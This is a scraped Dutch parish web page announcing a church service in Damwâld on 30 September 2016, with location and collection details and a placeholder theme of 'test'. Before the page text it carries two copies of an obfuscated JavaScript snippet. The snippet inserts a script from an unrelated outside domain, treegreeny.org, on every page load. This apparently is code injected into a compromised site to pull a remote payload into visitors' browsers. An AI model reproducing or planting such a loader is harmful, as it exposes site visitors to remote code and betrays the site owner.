;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst vrijdag 30 september 2016 9:30 uur - PKN Damwâld
vrijdag 30 september 2016
09:30 uur

Kerkdienst vrijdag 30 september 2016 9:30 uur

Thema: test

Informatie

Thema:test
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Uitganscollecte: Onderhoud gebouwen